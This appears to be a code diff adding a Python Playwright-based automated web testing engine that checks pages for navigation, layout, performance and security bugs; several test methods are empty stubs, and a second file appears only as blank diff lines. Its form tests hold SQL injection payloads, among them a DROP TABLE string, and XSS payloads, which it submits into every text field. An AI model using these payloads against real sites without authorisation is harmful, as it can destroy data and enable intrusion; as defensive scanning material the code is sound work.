+
self.bugs_found: List[BugReport] = []
|
| 53 |
+
self.test_scenarios = self._load_test_scenarios()
|
| 54 |
+
self.bug_patterns = self._load_bug_patterns()
|
| 55 |
+
self.performance_thresholds = self._load_performance_thresholds()
|
| 56 |
+
|
| 57 |
+
def _load_test_scenarios(self) -> Dict[str, List[Dict[str, Any]]]:
|
| 58 |
+
"""Load comprehensive test scenarios."""
|
| 59 |
+
return {
|
| 60 |
+
"navigation": [
|
| 61 |
+
{"action": "rapid_navigation", "description": "Rapidly navigate between pages"},
|
| 62 |
+
{"action": "back_forward", "description": "Test browser back/forward buttons"},
|
| 63 |
+
{"action": "refresh_test", "description": "Test page refresh functionality"},
|
| 64 |
+
{"action": "url_manipulation", "description": "Test URL manipulation and direct access"}
|
| 65 |
+
],
|
| 66 |
+
"form_testing": [
|
| 67 |
+
{"action": "empty_submission", "description": "Submit forms with empty fields"},
|
| 68 |
+
{"action": "invalid_data", "description": "Submit forms with invalid data"},
|
| 69 |
+
{"action": "sql_injection", "description": "Test for SQL injection vulnerabilities"},
|
| 70 |
+
{"action": "xss_attempts", "description": "Test for XSS vulnerabilities"},
|
| 71 |
+
{"action": "large_data", "description": "Submit forms with large amounts of data"},
|
| 72 |
+
{"action": "special_characters", "description": "Test with special characters"},
|
| 73 |
+
{"action": "unicode_testing", "description": "Test with Unicode characters"},
|
| 74 |
+
{"action": "script_injection", "description": "Test for script injection"}
|
| 75 |
+
],
|
| 76 |
+
"ui_testing": [
|
| 77 |
+
{"action": "responsive_test", "description": "Test responsive design"},
|
| 78 |
+
{"action": "accessibility_test", "description": "Test accessibility features"},
|
| 79 |
+
{"action": "hover_effects", "description": "Test hover effects and interactions"},
|
| 80 |
+
{"action": "click_areas", "description": "Test clickable areas and buttons"},
|
| 81 |
+
{"action": "scroll_behavior", "description": "Test scrolling behavior"},
|
| 82 |
+
{"action": "zoom_testing", "description": "Test zoom functionality"},
|
| 83 |
+
{"action": "keyboard_navigation", "description": "Test keyboard navigation"}
|
| 84 |
+
],
|
| 85 |
+
"performance": [
|
| 86 |
+
{"action": "load_time_test", "description": "Test page load times"},
|
| 87 |
+
{"action": "resource_loading", "description": "Test resource loading performance"},
|
| 88 |
+
{"action": "memory_usage", "description": "Monitor memory usage"},
|
| 89 |
+
{"action": "cpu_usage", "description": "Monitor CPU usage"},
|
| 90 |
+
{"action": "network_latency", "description": "Test network latency"}
|
| 91 |
+
],
|
| 92 |
+
"security": [
|
| 93 |
+
{"action": "csrf_test", "description": "Test for CSRF vulnerabilities"},
|
| 94 |
+
{"action": "clickjacking", "description": "Test for clickjacking vulnerabilities"},
|
| 95 |
+
{"action": "session_management", "description": "Test session management"},
|
| 96 |
+
{"action": "authentication", "description": "Test authentication mechanisms"},
|
| 97 |
+
{"action": "authorization", "description": "Test authorization controls"}
|
| 98 |
+
]
|
| 99 |
+
}
|
| 100 |
+
|
| 101 |
+
def _load_bug_patterns(self) -> Dict[str, List[str]]:
|
| 102 |
+
"""Load bug detection patterns."""
|
| 103 |
+
return {
|
| 104 |
+
"ui_bugs": [
|
| 105 |
+
"Element not visible",
|
| 106 |
+
"Element not clickable",
|
| 107 |
+
"Layout broken",
|
| 108 |
+
"Text overflow",
|
| 109 |
+
"Image not loading",
|
| 110 |
+
"Button not responding",
|
| 111 |
+
"Form validation missing",
|
| 112 |
+
"Error message not displayed",
|
| 113 |
+
"Loading state not handled",
|
| 114 |
+
"Responsive design issues"
|
| 115 |
+
],
|
| 116 |
+
"functional_bugs": [
|
| 117 |
+
"Function not working",
|
| 118 |
+
"Data not saved",
|
| 119 |
+
"Validation bypassed",
|
| 120 |
+
"Error not handled",
|
| 121 |
+
"State not maintained",
|
| 122 |
+
"Navigation broken",
|
| 123 |
+
"Search not working",
|
| 124 |
+
"Filter not applied",
|
| 125 |
+
"Sort not working",
|
| 126 |
+
"Pagination broken"
|
| 127 |
+
],
|
| 128 |
+
"performance_bugs": [
|
| 129 |
+
"Page load too slow",
|
| 130 |
+
"Memory leak detected",
|
| 131 |
+
"CPU usage high",
|
| 132 |
+
"Network timeout",
|
| 133 |
+
"Resource not optimized",
|
| 134 |
+
"Caching issues",
|
| 135 |
+
"Database slow query",
|
| 136 |
+
"API response slow",
|
| 137 |
+
"Image not optimized",
|
| 138 |
+
"JavaScript blocking"
|
| 139 |
+
],
|
| 140 |
+
"security_bugs": [
|
| 141 |
+
"SQL injection possible",
|
| 142 |
+
"XSS vulnerability",
|
| 143 |
+
"CSRF token missing",
|
| 144 |
+
"Authentication bypass",
|
| 145 |
+
"Authorization issue",
|
| 146 |
+
"Data exposure",
|
| 147 |
+
"Session hijacking",
|
| 148 |
+
"Clickjacking possible",
|
| 149 |
+
"Input not sanitized",
|
| 150 |
+
"Error information leaked"
|
| 151 |
+
]
|
| 152 |
+
}
|
| 153 |
+
|
| 154 |
+
def _load_performance_thresholds(self) -> Dict[str, float]:
|
| 155 |
+
"""Load performance thresholds."""
|
| 156 |
+
return {
|
| 157 |
+
"page_load_time": 3.0, # seconds
|
| 158 |
+
"element_interaction_time": 1.0, # seconds
|
| 159 |
+
"form_submission_time": 2.0, # seconds
|
| 160 |
+
"navigation_time": 1.5, # seconds
|
| 161 |
+
"memory_usage_mb": 100.0, # MB
|
| 162 |
+
"cpu_usage_percent": 80.0, # percentage
|
| 163 |
+
}
|
| 164 |
+
|
| 165 |
+
async def run_comprehensive_testing(self, page: Page) -> List[BugReport]:
|
| 166 |
+
"""Run comprehensive testing with all AI agents."""
|
| 167 |
+
logger.info("🤖 Starting comprehensive AI testing...")
|
| 168 |
+
|
| 169 |
+
# Clear previous bugs
|
| 170 |
+
self.bugs_found.clear()
|
| 171 |
+
|
| 172 |
+
# Run all test scenarios
|
| 173 |
+
await self._test_navigation_scenarios(page)
|
| 174 |
+
await self._test_form_scenarios(page)
|
| 175 |
+
await self._test_ui_scenarios(page)
|
| 176 |
+
await self._test_performance_scenarios(page)
|
| 177 |
+
await self._test_security_scenarios(page)
|
| 178 |
+
|
| 179 |
+
logger.info(f"🔍 Found {len(self.bugs_found)} bugs/issues during testing")
|
| 180 |
+
return self.bugs_found
|
| 181 |
+
|
| 182 |
+
async def _test_navigation_scenarios(self, page: Page):
|
| 183 |
+
"""Test navigation scenarios."""
|
| 184 |
+
logger.info("🧭 Testing navigation scenarios...")
|
| 185 |
+
|
| 186 |
+
try:
|
| 187 |
+
# Test rapid navigation
|
| 188 |
+
await self._rapid_navigation_test(page)
|
| 189 |
+
|
| 190 |
+
# Test back/forward
|
| 191 |
+
await self._back_forward_test(page)
|
| 192 |
+
|
| 193 |
+
# Test refresh
|
| 194 |
+
await self._refresh_test(page)
|
| 195 |
+
|
| 196 |
+
# Test URL manipulation
|
| 197 |
+
await self._url_manipulation_test(page)
|
| 198 |
+
|
| 199 |
+
except Exception as e:
|
| 200 |
+
logger.error(f"Navigation testing error: {e}")
|
| 201 |
+
|
| 202 |
+
async def _test_form_scenarios(self, page: Page):
|
| 203 |
+
"""Test form scenarios."""
|
| 204 |
+
logger.info("📝 Testing form scenarios...")
|
| 205 |
+
|
| 206 |
+
try:
|
| 207 |
+
# Find all forms
|
| 208 |
+
forms = await page.query_selector_all('form')
|
| 209 |
+
|
| 210 |
+
for form in forms:
|
| 211 |
+
# Test empty submission
|
| 212 |
+
await self._test_empty_form_submission(form, page)
|
| 213 |
+
|
| 214 |
+
# Test invalid data
|
| 215 |
+
await self._test_invalid_form_data(form, page)
|
| 216 |
+
|
| 217 |
+
# Test SQL injection
|
| 218 |
+
await self._test_sql_injection_forms(form, page)
|
| 219 |
+
|
| 220 |
+
# Test XSS attempts
|
| 221 |
+
await self._test_xss_forms(form, page)
|
| 222 |
+
|
| 223 |
+
# Test large data
|
| 224 |
+
await self._test_large_form_data(form, page)
|
| 225 |
+
|
| 226 |
+
# Test special characters
|
| 227 |
+
await self._test_special_characters(form, page)
|
| 228 |
+
|
| 229 |
+
except Exception as e:
|
| 230 |
+
logger.error(f"Form testing error: {e}")
|
| 231 |
+
|
| 232 |
+
async def _test_ui_scenarios(self, page: Page):
|
| 233 |
+
"""Test UI scenarios."""
|
| 234 |
+
logger.info("🎨 Testing UI scenarios...")
|
| 235 |
+
|
| 236 |
+
try:
|
| 237 |
+
# Test responsive design
|
| 238 |
+
await self._test_responsive_design(page)
|
| 239 |
+
|
| 240 |
+
# Test accessibility
|
| 241 |
+
await self._test_accessibility(page)
|
| 242 |
+
|
| 243 |
+
# Test hover effects
|
| 244 |
+
await self._test_hover_effects(page)
|
| 245 |
+
|
| 246 |
+
# Test clickable areas
|
| 247 |
+
await self._test_clickable_areas(page)
|
| 248 |
+
|
| 249 |
+
# Test scrolling
|
| 250 |
+
await self._test_scrolling_behavior(page)
|
| 251 |
+
|
| 252 |
+
except Exception as e:
|
| 253 |
+
logger.error(f"UI testing error: {e}")
|
| 254 |
+
|
| 255 |
+
async def _test_performance_scenarios(self, page: Page):
|
| 256 |
+
"""Test performance scenarios."""
|
| 257 |
+
logger.info("⚡ Testing performance scenarios...")
|
| 258 |
+
|
| 259 |
+
try:
|
| 260 |
+
# Test page load time
|
| 261 |
+
await self._test_page_load_time(page)
|
| 262 |
+
|
| 263 |
+
# Test resource loading
|
| 264 |
+
await self._test_resource_loading(page)
|
| 265 |
+
|
| 266 |
+
# Test memory usage
|
| 267 |
+
await self._test_memory_usage(page)
|
| 268 |
+
|
| 269 |
+
# Test network performance
|
| 270 |
+
await self._test_network_performance(page)
|
| 271 |
+
|
| 272 |
+
except Exception as e:
|
| 273 |
+
logger.error(f"Performance testing error: {e}")
|
| 274 |
+
|
| 275 |
+
async def _test_security_scenarios(self, page: Page):
|
| 276 |
+
"""Test security scenarios."""
|
| 277 |
+
logger.info("🔒 Testing security scenarios...")
|
| 278 |
+
|
| 279 |
+
try:
|
| 280 |
+
# Test CSRF
|
| 281 |
+
await self._test_csrf_vulnerabilities(page)
|
| 282 |
+
|
| 283 |
+
# Test clickjacking
|
| 284 |
+
await self._test_clickjacking(page)
|
| 285 |
+
|
| 286 |
+
# Test session management
|
| 287 |
+
await self._test_session_management(page)
|
| 288 |
+
|
| 289 |
+
# Test authentication
|
| 290 |
+
await self._test_authentication(page)
|
| 291 |
+
|
| 292 |
+
except Exception as e:
|
| 293 |
+
logger.error(f"Security testing error: {e}")
|
| 294 |
+
|
| 295 |
+
async def _rapid_navigation_test(self, page: Page):
|
| 296 |
+
"""Test rapid navigation between pages."""
|
| 297 |
+
try:
|
| 298 |
+
# Get all links
|
| 299 |
+
links = await page.query_selector_all('a[href]')
|
| 300 |
+
|
| 301 |
+
if len(links) > 3:
|
| 302 |
+
# Click first 3 links rapidly
|
| 303 |
+
for i in range(min(3, len(links))):
|
| 304 |
+
try:
|
| 305 |
+
await links[i].click()
|
| 306 |
+
await page.wait_for_timeout(500) # Short wait
|
| 307 |
+
|
| 308 |
+
# Check for errors
|
| 309 |
+
if await self._check_for_errors(page):
|
| 310 |
+
self._add_bug_report(
|
| 311 |
+
title="Rapid Navigation Error",
|
| 312 |
+
severity=BugSeverity.MEDIUM,
|
| 313 |
+
description="Error occurred during rapid navigation",
|
| 314 |
+
steps_to_reproduce=["Navigate rapidly between pages", "Click multiple links quickly"],
|
| 315 |
+
expected_behavior="Navigation should work smoothly",
|
| 316 |
+
actual_behavior="Error occurred during navigation",
|
| 317 |
+
url=page.url,
|
| 318 |
+
element_info={"link_index": i},
|
| 319 |
+
recommendations=["Add loading states", "Implement proper error handling"]
|
| 320 |
+
)
|
| 321 |
+
except Exception as e:
|
| 322 |
+
self._add_bug_report(
|
| 323 |
+
title="Navigation Failure",
|
| 324 |
+
severity=BugSeverity.HIGH,
|
| 325 |
+
description=f"Failed to navigate: {str(e)}",
|
| 326 |
+
steps_to_reproduce=["Click on navigation link", "Observe error"],
|
| 327 |
+
expected_behavior="Navigation should work",
|
| 328 |
+
actual_behavior=f"Navigation failed: {str(e)}",
|
| 329 |
+
url=page.url,
|
| 330 |
+
element_info={"link_index": i},
|
| 331 |
+
recommendations=["Fix navigation logic", "Add error handling"]
|
| 332 |
+
)
|
| 333 |
+
except Exception as e:
|
| 334 |
+
logger.error(f"Rapid navigation test error: {e}")
|
| 335 |
+
|
| 336 |
+
async def _test_empty_form_submission(self, form: Locator, page: Page):
|
| 337 |
+
"""Test form submission with empty fields."""
|
| 338 |
+
try:
|
| 339 |
+
# Find all input fields
|
| 340 |
+
inputs = await form.query_selector_all('input, textarea, select')
|
| 341 |
+
|
| 342 |
+
if inputs:
|
| 343 |
+
# Try to submit empty form
|
| 344 |
+
submit_button = await form.query_selector('button[type="submit"], input[type="submit"]')
|
| 345 |
+
if submit_button:
|
| 346 |
+
await submit_button.click()
|
| 347 |
+
await page.wait_for_timeout(1000)
|
| 348 |
+
|
| 349 |
+
# Check if validation is working
|
| 350 |
+
error_elements = await page.query_selector_all('.error, .invalid, [class*="error"], [class*="invalid"]')
|
| 351 |
+
|
| 352 |
+
if not error_elements:
|
| 353 |
+
self._add_bug_report(
|
| 354 |
+
title="Missing Form Validation",
|
| 355 |
+
severity=BugSeverity.HIGH,
|
| 356 |
+
description="Form accepts empty submissions without validation",
|
| 357 |
+
steps_to_reproduce=["Leave form fields empty", "Submit form"],
|
| 358 |
+
expected_behavior="Form should show validation errors",
|
| 359 |
+
actual_behavior="Form submitted without validation",
|
| 360 |
+
url=page.url,
|
| 361 |
+
element_info={"form_action": await form.get_attribute("action")},
|
| 362 |
+
recommendations=["Add client-side validation", "Add server-side validation"]
|
| 363 |
+
)
|
| 364 |
+
except Exception as e:
|
| 365 |
+
logger.error(f"Empty form submission test error: {e}")
|
| 366 |
+
|
| 367 |
+
async def _test_sql_injection_forms(self, form: Locator, page: Page):
|
| 368 |
+
"""Test forms for SQL injection vulnerabilities."""
|
| 369 |
+
try:
|
| 370 |
+
inputs = await form.query_selector_all('input[type="text"], input[type="email"], textarea')
|
| 371 |
+
|
| 372 |
+
sql_payloads = [
|
| 373 |
+
"' OR '1'='1",
|
| 374 |
+
"'; DROP TABLE users; --",
|
| 375 |
+
"' UNION SELECT * FROM users --",
|
| 376 |
+
"admin'--",
|
| 377 |
+
"' OR 1=1#"
|
| 378 |
+
]
|
| 379 |
+
|
| 380 |
+
for input_field in inputs:
|
| 381 |
+
for payload in sql_payloads:
|
| 382 |
+
try:
|
| 383 |
+
await input_field.fill(payload)
|
| 384 |
+
submit_button = await form.query_selector('button[type="submit"], input[type="submit"]')
|
| 385 |
+
if submit_button:
|
| 386 |
+
await submit_button.click()
|
| 387 |
+
await page.wait_for_timeout(1000)
|
| 388 |
+
|
| 389 |
+
# Check for SQL error messages
|
| 390 |
+
content = await page.content()
|
| 391 |
+
sql_errors = [
|
| 392 |
+
"mysql_fetch_array", "ORA-01756", "Microsoft OLE DB Provider",
|
| 393 |
+
"SQLServer JDBC Driver", "PostgreSQL query failed", "Warning: mysql_",
|
| 394 |
+
"valid MySQL result", "MySqlClient.", "SQL syntax"
|
| 395 |
+
]
|
| 396 |
+
|
| 397 |
+
for error in sql_errors:
|
| 398 |
+
if error.lower() in content.lower():
|
| 399 |
+
self._add_bug_report(
|
| 400 |
+
title="SQL Injection Vulnerability",
|
| 401 |
+
severity=BugSeverity.CRITICAL,
|
| 402 |
+
description=f"SQL injection vulnerability detected with payload: {payload}",
|
| 403 |
+
steps_to_reproduce=[f"Enter payload: {payload}", "Submit form"],
|
| 404 |
+
expected_behavior="Input should be sanitized",
|
| 405 |
+
actual_behavior="SQL injection successful",
|
| 406 |
+
url=page.url,
|
| 407 |
+
element_info={"payload": payload, "error": error},
|
| 408 |
+
recommendations=["Use parameterized queries", "Sanitize input", "Implement proper validation"]
|
| 409 |
+
)
|
| 410 |
+
break
|
| 411 |
+
|
| 412 |
+
# Clear input for next test
|
| 413 |
+
await input_field.fill("")
|
| 414 |
+
|
| 415 |
+
except Exception as e:
|
| 416 |
+
logger.warning(f"SQL injection test error: {e}")
|
| 417 |
+
continue
|
| 418 |
+
except Exception as e:
|
| 419 |
+
logger.error(f"SQL injection form test error: {e}")
|
| 420 |
+
|
| 421 |
+
async def _test_xss_forms(self, form: Locator, page: Page):
|
| 422 |
+
"""Test forms for XSS vulnerabilities."""
|
| 423 |
+
try:
|
| 424 |
+
inputs = await form.query_selector_all('input[type="text"], input[type="email"], textarea')
|
| 425 |
+
|
| 426 |
+
xss_payloads = [
|
| 427 |
+
"<script>alert('XSS')</script>",
|
| 428 |
+
"<img src=x onerror=alert('XSS')>",
|
| 429 |
+
"javascript:alert('XSS')",
|
| 430 |
+
"<svg onload=alert('XSS')>",
|
| 431 |
+
"<iframe src=javascript:alert('XSS')></iframe>"
|
| 432 |
+
]
|
| 433 |
+
|
| 434 |
+
for input_field in inputs:
|
| 435 |
+
for payload in xss_payloads:
|
| 436 |
+
try:
|
| 437 |
+
await input_field.fill(payload)
|
| 438 |
+
submit_button = await form.query_selector('button[type="submit"], input[type="submit"]')
|
| 439 |
+
if submit_button:
|
| 440 |
+
await submit_button.click()
|
| 441 |
+
await page.wait_for_timeout(1000)
|
| 442 |
+
|
| 443 |
+
# Check if payload is reflected
|
| 444 |
+
content = await page.content()
|
| 445 |
+
if payload in content:
|
| 446 |
+
self._add_bug_report(
|
| 447 |
+
title="XSS Vulnerability",
|
| 448 |
+
severity=BugSeverity.CRITICAL,
|
| 449 |
+
description=f"XSS vulnerability detected with payload: {payload}",
|
| 450 |
+
steps_to_reproduce=[f"Enter payload: {payload}", "Submit form"],
|
| 451 |
+
expected_behavior="Input should be sanitized",
|
| 452 |
+
actual_behavior="XSS payload reflected",
|
| 453 |
+
url=page.url,
|
| 454 |
+
element_info={"payload": payload},
|
| 455 |
+
recommendations=["Sanitize output", "Use CSP headers", "Validate input"]
|
| 456 |
+
)
|
| 457 |
+
|
| 458 |
+
# Clear input for next test
|
| 459 |
+
await input_field.fill("")
|
| 460 |
+
|
| 461 |
+
except Exception as e:
|
| 462 |
+
logger.warning(f"XSS test error: {e}")
|
| 463 |
+
continue
|
| 464 |
+
except Exception as e:
|
| 465 |
+
logger.error(f"XSS form test error: {e}")
|
| 466 |
+
|
| 467 |
+
async def _test_responsive_design(self, page: Page):
|
| 468 |
+
"""Test responsive design."""
|
| 469 |
+
try:
|
| 470 |
+
viewports = [
|
| 471 |
+
{"width": 320, "height": 568}, # iPhone SE
|
| 472 |
+
{"width": 375, "height": 667}, # iPhone 8
|
| 473 |
+
{"width": 768, "height": 1024}, # iPad
|
| 474 |
+
{"width": 1024, "height": 768}, # Desktop
|
| 475 |
+
{"width": 1920, "height": 1080} # Large desktop
|
| 476 |
+
]
|
| 477 |
+
|
| 478 |
+
for viewport in viewports:
|
| 479 |
+
await page.set_viewport_size(viewport)
|
| 480 |
+
await page.wait_for_timeout(500)
|
| 481 |
+
|
| 482 |
+
# Check for layout issues
|
| 483 |
+
elements = await page.query_selector_all('*')
|
| 484 |
+
for element in elements:
|
| 485 |
+
try:
|
| 486 |
+
box = await element.bounding_box()
|
| 487 |
+
if box and (box['width'] > viewport['width'] or box['height'] > viewport['height']):
|
| 488 |
+
self._add_bug_report(
|
| 489 |
+
title="Responsive Design Issue",
|
| 490 |
+
severity=BugSeverity.MEDIUM,
|
| 491 |
+
description=f"Element overflows viewport at {viewport['width']}x{viewport['height']}",
|
| 492 |
+
steps_to_reproduce=[f"Set viewport to {viewport['width']}x{viewport['height']}", "Check layout"],
|
| 493 |
+
expected_behavior="Elements should fit within viewport",
|
| 494 |
+
actual_behavior="Element overflows viewport",
|
| 495 |
+
url=page.url,
|
| 496 |
+
element_info={"viewport": viewport, "element_box": box},
|
| 497 |
+
recommendations=["Fix CSS media queries", "Adjust element sizing", "Test responsive design"]
|
| 498 |
+
)
|
| 499 |
+
except Exception as e:
|
| 500 |
+
continue
|
| 501 |
+
except Exception as e:
|
| 502 |
+
logger.error(f"Responsive design test error: {e}")
|
| 503 |
+
|
| 504 |
+
async def _test_page_load_time(self, page: Page):
|
| 505 |
+
"""Test page load time."""
|
| 506 |
+
try:
|
| 507 |
+
start_time = await page.evaluate("performance.now()")
|
| 508 |
+
await page.reload()
|
| 509 |
+
await page.wait_for_load_state('networkidle')
|
| 510 |
+
end_time = await page.evaluate("performance.now()")
|
| 511 |
+
|
| 512 |
+
load_time = (end_time - start_time) / 1000 # Convert to seconds
|
| 513 |
+
|
| 514 |
+
if load_time > self.performance_thresholds['page_load_time']:
|
| 515 |
+
self._add_bug_report(
|
| 516 |
+
title="Slow Page Load Time",
|
| 517 |
+
severity=BugSeverity.MEDIUM,
|
| 518 |
+
description=f"Page load time is {load_time:.2f}s, exceeds threshold of {self.performance_thresholds['page_load_time']}s",
|
| 519 |
+
steps_to_reproduce=["Reload page", "Measure load time"],
|
| 520 |
+
expected_behavior="Page should load quickly",
|
| 521 |
+
actual_behavior=f"Page loads in {load_time:.2f}s",
|
| 522 |
+
url=page.url,
|
| 523 |
+
element_info={"load_time": load_time, "threshold": self.performance_thresholds['page_load_time']},
|
| 524 |
+
recommendations=["Optimize images", "Minify CSS/JS", "Use CDN", "Enable compression"]
|
| 525 |
+
)
|
| 526 |
+
except Exception as e:
|
| 527 |
+
logger.error(f"Page load time test error: {e}")
|
| 528 |
+
|
| 529 |
+
async def _check_for_errors(self, page: Page) -> bool:
|
| 530 |
+
"""Check for JavaScript errors on the page."""
|
| 531 |
+
try:
|
| 532 |
+
# Check console for errors
|
| 533 |
+
errors = await page.evaluate("""
|
| 534 |
+
() => {
|
| 535 |
+
if (window.fagunErrorMonitor) {
|
| 536 |
+
return window.fagunErrorMonitor.getErrors();
|
| 537 |
+
}
|
| 538 |
+
return [];
|
| 539 |
+
}
|
| 540 |
+
""")
|
| 541 |
+
return len(errors) > 0
|
| 542 |
+
except Exception:
|
| 543 |
+
return False
|
| 544 |
+
|
| 545 |
+
def _add_bug_report(self, title: str, severity: BugSeverity, description: str,
|
| 546 |
+
steps_to_reproduce: List[str], expected_behavior: str,
|
| 547 |
+
actual_behavior: str, url: str, element_info: Dict[str, Any],
|
| 548 |
+
recommendations: List[str]):
|
| 549 |
+
"""Add a bug report."""
|
| 550 |
+
bug = BugReport(
|
| 551 |
+
title=title,
|
| 552 |
+
severity=severity,
|
| 553 |
+
description=description,
|
| 554 |
+
steps_to_reproduce=steps_to_reproduce,
|
| 555 |
+
expected_behavior=expected_behavior,
|
| 556 |
+
actual_behavior=actual_behavior,
|
| 557 |
+
url=url,
|
| 558 |
+
element_info=element_info,
|
| 559 |
+
recommendations=recommendations
|
| 560 |
+
)
|
| 561 |
+
self.bugs_found.append(bug)
|
| 562 |
+
logger.info(f"🐛 Bug found: {title} ({severity.value})")
|
| 563 |
+
|
| 564 |
+
# Placeholder methods for other tests
|
| 565 |
+
async def _back_forward_test(self, page: Page):
|
| 566 |
+
"""Test browser back/forward functionality."""
|
| 567 |
+
pass
|
| 568 |
+
|
| 569 |
+
async def _refresh_test(self, page: Page):
|
| 570 |
+
"""Test page refresh functionality."""
|
| 571 |
+
pass
|
| 572 |
+
|
| 573 |
+
async def _url_manipulation_test(self, page: Page):
|
| 574 |
+
"""Test URL manipulation."""
|
| 575 |
+
pass
|
| 576 |
+
|
| 577 |
+
async def _test_invalid_form_data(self, form: Locator, page: Page):
|
| 578 |
+
"""Test form with invalid data."""
|
| 579 |
+
pass
|
| 580 |
+
|
| 581 |
+
async def _test_large_form_data(self, form: Locator, page: Page):
|
| 582 |
+
"""Test form with large data."""
|
| 583 |
+
pass
|
| 584 |
+
|
| 585 |
+
async def _test_special_characters(self, form: Locator, page: Page):
|
| 586 |
+
"""Test form with special characters."""
|
| 587 |
+
pass
|
| 588 |
+
|
| 589 |
+
async def _test_accessibility(self, page: Page):
|
| 590 |
+
"""Test accessibility features."""
|
| 591 |
+
pass
|
| 592 |
+
|
| 593 |
+
async def _test_hover_effects(self, page: Page):
|
| 594 |
+
"""Test hover effects."""
|
| 595 |
+
pass
|
| 596 |
+
|
| 597 |
+
async def _test_clickable_areas(self, page: Page):
|
| 598 |
+
"""Test clickable areas."""
|
| 599 |
+
pass
|
| 600 |
+
|
| 601 |
+
async def _test_scrolling_behavior(self, page: Page):
|
| 602 |
+
"""Test scrolling behavior."""
|
| 603 |
+
pass
|
| 604 |
+
|
| 605 |
+
async def _test_resource_loading(self, page: Page):
|
| 606 |
+
"""Test resource loading performance."""
|
| 607 |
+
pass
|
| 608 |
+
|
| 609 |
+
async def _test_memory_usage(self, page: Page):
|
| 610 |
+
"""Test memory usage."""
|
| 611 |
+
pass
|
| 612 |
+
|
| 613 |
+
async def _test_network_performance(self, page: Page):
|
| 614 |
+
"""Test network performance."""
|
| 615 |
+
pass
|
| 616 |
+
|
| 617 |
+
async def _test_csrf_vulnerabilities(self, page: Page):
|
| 618 |
+
"""Test CSRF vulnerabilities."""
|
| 619 |
+
pass
|
| 620 |
+
|
| 621 |
+
async def _test_clickjacking(self, page: Page):
|
| 622 |
+
"""Test clickjacking vulnerabilities."""
|
| 623 |
+
pass
|
| 624 |
+
|
| 625 |
+
async def _test_session_management(self, page: Page):
|
| 626 |
+
"""Test session management."""
|
| 627 |
+
pass
|
| 628 |
+
|
| 629 |
+
async def _test_authentication(self, page: Page):
|
| 630 |
+
"""Test authentication."""
|
| 631 |
+
pass
|
| 632 |
+
|
| 633 |
+
|
| 634 |
+
# Global enhanced testing engine
|
| 635 |
+
enhanced_ai_testing_engine = EnhancedAITestingEngine()
|
src/utils/error_monitor.py
ADDED
|
@@ -0,0 +1,615 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
